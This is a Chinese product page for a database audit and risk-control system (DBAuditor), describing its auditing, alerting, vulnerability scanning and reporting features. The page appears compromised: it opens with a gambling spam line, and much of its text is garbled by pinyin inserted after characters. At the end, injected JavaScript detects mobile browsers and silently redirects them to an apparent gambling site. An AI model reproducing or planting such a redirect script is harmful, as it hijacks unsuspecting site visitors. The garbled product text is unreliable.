mg游戏推荐

明御数据库审计与风险控制系统

明御数据库审计与风险控制系统

明(ming)(ming)御(yu) 数(shu)(shu)(shu)据(ju)(ju)库(ku)审(shen)计(ji)与风(feng)险(xian)(xian)控(kong)制系(xi)统(简(jian)称(cheng):DAS - DBAuditor) 是(shi)安(an)恒信(xin)息在多(duo)年数(shu)(shu)(shu)据(ju)(ju)库(ku)安(an)全理论研究与实(shi)践的(de)基础(chu)上,结合(he)各类法(fa)令法(fa)规(如(ru)等级(ji)保(bao)(bao)护、分级(ji)保(bao)(bao)护、企业内控(kong)、SOX、PCI等)对(dui) 数(shu)(shu)(shu)据(ju)(ju)库(ku)安(an)全的(de)要求,自主(zhu)研发的(de)业界首创细粒度(du)审(shen)计(ji)、双向审(shen)计(ji)、 全方位风(feng)险(xian)(xian)控(kong)制的(de)数(shu)(shu)(shu)据(ju)(ju)库(ku)安(an)全审(shen)计(ji)产 品。明(ming)(ming)御(yu)®数(shu)(shu)(shu)据(ju)(ju)库(ku)审(shen)计(ji)与风(feng)险(xian)(xian)控(kong)制系(xi)统是(shi)一款基于(yu)对(dui)数(shu)(shu)(shu)据(ju)(ju)库(ku)传输协议深度(du)解析的(de)基础(chu)上进行风(feng)险(xian)(xian)识(shi)别和告警通(tong)知的(de)系(xi)统。明(ming)(ming)御(yu)®

  • 类别:

明御 数据库(ku)审(shen)计(ji)与(yu)风险控(kong)(kong)制(zhi)系统(简(jian)称:DAS - DBAuditor) 是安(an)恒信息在多年(nian)数据库(ku)安(an)全(quan)(quan)理论(lun)研(yan)究与(yu)实践的基础上,结合各(ge)类法令(ling)法规(如等(deng)级保(bao)护、分(fen)级保(bao)护、企业内(nei)控(kong)(kong)、SOX、PCI等(deng))对 数据库(ku)安(an)全(quan)(quan)的要(yao)求,自主(zhu)研(yan)发的业界首创细(xi)粒度(du)审(shen)计(ji)、双向审(shen)计(ji)、 全(quan)(quan)方(fang)位风险控(kong)(kong)制(zhi)的数据库(ku)安(an)全(quan)(quan)审(shen)计(ji)产 品。明御®数据库审计与风险控制系统是一款基于对数据库传输协议深度解析的基础上进行风险识别和告警通知的系统。明御®数据库审计与风险控制系统具有对数据库访问行为进行实时审计、对数据库的恶意攻击、数据库违规访问等行为识别的能力。

设备价值

1.全(quan)面(mian)记(ji)录数(shu)据(ju)库访问(wen)行为(wei),识(shi)别(bie)越权操(cao)作等违(wei)规(gui)行为(wei),并完成追踪溯源(yuan);

2.跟踪(zong)敏感(gan)(gan)数据(ju)访问行为(wei)轨迹(ji),构建行为(wei)模型,及时发(fa)现敏感(gan)(gan)数据(ju)泄漏;

3.检(jian)测数据库配置弱点、发现SQL注入(ru)等漏洞、提(ti)供解决建议(yi);

4.为(wei)数据(ju)库安(an)全(quan)管理与性能(neng)优化提供决策依(yi)据(ju);

5.提(ti)供符合(he)法(fa)律法(fa)规(gui)的报(bao)告,满足(zu)等(deng)级(ji)保护、企业内控等(deng)审计要求。

设备功能

DBAuditor基于(yu)“金字塔模型”设计(ji),分成原(yuan)始信息收集(ji)、审计(ji)信息标准化、审计(ji)信息筛选、预警与报表共四大模块。

图片关键词

原始信息收集

DBAuditor通过旁路(lu)镜像的模式进行部署(shu),在(zai)不改变用户现(xian)有(you)网络(luo)结构、不对数据库产生任(ren)何影响的情况下全面审计数据库访问行为。DBAuditor支持分布式部署(shu),实现(xian)配(pei)置与报表(biao)的集中管理、并(bing)发流量(liang)采集与处理、多点(dian)存储、多级管理。



图片关键词

DBAuditor提供自(zi)动(dong)(dong)定期发(fa)现功能,可(ke)(ke)及时发(fa)现新增(zeng)或者一些未知的数据库并告警,也可(ke)(ke)自(zi)动(dong)(dong)加载为审计对象。

图片关键词

审计信息(xi)标准(zhun)化

DBAuditor支持(chi)国(guo)内外主流数据(ju)库(ku),包括Oracle、SQL server、DB2、Mysql、Informix等(deng)主流数据(ju)库(ku),神通(tong)QSCAR、达(da)(da) 梦(meng)DM、人大金仓等(deng)国(guo)产(chan)数据(ju)库(ku),Cache、Teradata等(deng)专有(you)数据(ju) 库(ku),以及(ji)hbase、MongoDB等(deng)非(fei)关系(xi)型数据(ju)库(ku),支持(chi)的(de)协议种(zhong)类多达(da)(da)20种(zhong)以上。并将不同数据(ju)库(ku)协议按照(zhao)标准化的(de)格(ge)式进行展示,方便(bian)管理(li)人员阅读和分析。

审(shen)计信息筛选(xuan)

DBAuditor根据5W1H分析模(mo)型(xing)进行规(gui)制设计,提供丰富(fu)的(de)规(gui)则(ze)条(tiao)件(jian)和向(xiang)导(dao)式的(de)规(gui)则(ze)配置(zhi)方法,同(tong)时内置(zhi)了300多条(tiao)安(an)全相关的(de)审计分析规(gui)则(ze)。

预警与报表

DBAuditor提供Syslog、短信、邮件、SNMP、FTP等(deng)(deng)丰富的 告警方式,可(ke)第一时(shi)间通(tong)知管理(li)人员,并可(ke)与SOC平台(tai)等(deng)(deng)进行日志 的整(zheng)合(he)。

DBAuditor内(nei)置了40多种高(gao)价值、符合法律法规(gui)(gui)的(de)分(fen)析报(bao)表(biao), 可(ke)从数据(ju)库账号增删(shan)、密码修改、权(quan)限(xian)变更、高(gao)危(wei)操作、违规(gui)(gui)告警、账号复用、数据(ju)库性能分(fen)析等角度进行分(fen)析,同时支(zhi)持自定义(yi) 的(de)方式定制更多报(bao)表(biao)。

多核(he)、多线程(cheng)并行处(chu)理技术,处(chu)理性能遥遥领(ling)先

DBAudit通过定制(zhi)专有的硬件平台,充分发挥CPU计算(suan)能(neng)力, 通过多线程分布式处理(li)技术,使数据库审计系统的处理(li)能(neng)力大大提(ti) 高,真正(zheng)领(ling)先(xian)于国内同(tong)类型设备。

数据库安全配置(zhi)分(fen)析和(he)漏洞评(ping)估

DBAuditor集成(cheng)安恒数(shu)据库(ku)安全(quan)漏洞(dong)扫(sao)描技(ji)术优势,形成(cheng)漏洞(dong) 扫(sao)描、安全(quan)审(shen)计(ji)为一(yi)体的(de)解决方案。并(bing)可以指定周(zhou)期自动扫(sao)描,发 现(xian)配置不(bu)合(he)理项,弱口令、漏洞(dong)等问题,并(bing)给(ji)出合(he)理的(de)安全(quan)建议,生成(cheng)安全(quan)漏洞(dong)扫(sao)描报告。

智能关联分(fen)析

通过(guo)同时提(ti)取Web业务(wu)端(duan)(duan)和数据库端(duan)(duan)的(de)协议流量,提(ti)取出(chu)具体 业务(wu)操作请求(qiu)URL、POST/GET值、业务(wu)账号、原始(shi)客户端(duan)(duan)IP、 MAC地址(zhi)、提(ti)交参数等(deng)。通过(guo)智能自动多层(ceng)关(guan)联(lian)(lian),关(guan)联(lian)(lian)出(chu)每条SQL 语(yu)句所对应(ying)URL,以及(ji)其原始(shi)客户端(duan)(duan)IP地址(zhi)等(deng)信息,实现追踪(zong)溯源(yuan)。

独有(you)的双向审计

DBAuditor通过多年的协议解析积累,实现完整的双向审(shen)计(ji)。 双向审(shen)计(ji)不仅有SQL执行(xing)(xing)状(zhuang)态(tai)、返(fan)回行(xing)(xing)数、返(fan)回时(shi)间等基本信息, 且包(bao)含返(fan)回结果集(ji)。如(ru)下(xia)图:

图片关键词

数据库行为轨(gui)迹分析

DBAuditor通过创新的行为轨(gui)迹分(fen)析方(fang)法(fa),使得审(shen)(shen)计(ji)(ji)员摆(bai)脱了(le) 从成千上万条日(ri)志进(jin)行枯燥分(fen)析的烦恼,大大提高(gao)了(le)分(fen)析效率,提高(gao)了(le)审(shen)(shen)计(ji)(ji)的易(yi)读性和(he)价值。

图片关键词


var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();